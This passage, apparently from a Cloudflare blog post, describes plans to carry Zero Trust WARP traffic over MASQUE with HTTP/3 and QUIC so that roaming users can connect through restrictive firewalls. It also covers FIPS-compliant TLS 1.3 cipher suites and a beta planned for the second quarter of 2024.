Cloudflare is already operating MASQUE, HTTP/3, and QUIC reliably at scale. So we want you, our Zero Trust WARP users and Cloudflare One customers, to benefit from that same reliability and scale.

Connect from anywhere

Employees need to be able to connect from anywhere that has an Internet connection. But that can be a challenge as many security engineers will configure firewalls and other networking devices to block all ports by default, and only open the most well-known and common ports. As we pointed out earlier, this can be frustrating for the roaming Zero Trust WARP user.

We want to fix that for our users, and remove that frustration. HTTP/3 and QUIC deliver the perfect solution. QUIC is carried on top of UDP (protocol number 17), while HTTP/3 uses port 443 for encrypted traffic. Both of these are well known, widely used, and are very unlikely to be blocked.

We want our Zero Trust WARP users to reliably connect wherever they might be.

Compliant cipher suites

MASQUE leverages TLS 1.3 with QUIC, which provides a number of cipher suite choices. WireGuard also uses standard cipher suites. But some standards are more, let’s say, standard than others.

NIST, the National Institute of Standards and Technology and part of the US Department of Commerce, does a tremendous amount of work across the technology landscape. Of interest to us is the NIST research into network security that results in FIPS 140-2 and similar publications. NIST studies individual cipher suites and publishes lists of those they recommend for use, recommendations that become requirements for US Government entities. Many other customers, both government and commercial, use these same recommendations as requirements.

Our first MASQUE implementation for Zero Trust WARP will use TLS 1.3 and FIPS compliant cipher suites.

How can I get Zero Trust WARP with MASQUE?

Cloudflare engineers are hard at work implementing MASQUE for the mobile apps, the desktop clients, and the Cloudflare network. Progress has been good, and we will open this up for beta testing early in the second quarter of 2024 for Cloudflare One customers. Your account team will be reaching out with participation details.

Continuing the journey with Zero Trust WARP

Cloudflare launched WARP five years ago, and we’ve come a long way since. This introduction of MASQUE to Zero Trust WARP is a big step, one that will immediately deliver the benefits noted above. But there will be more — we believe MASQUE opens up new opportunities to leverage the capabilities of QUIC and HTTP/3 to build innovative Zero Trust solutions. And we’re also continuing to work on other new capabilities for our Zero Trust customers.
Cloudflare is committed to continuing our mission to help build a better Internet, one that is more private and secure, scalable, reliable, and fast. And if you would like to join us in this exciting journey, check out our open positions.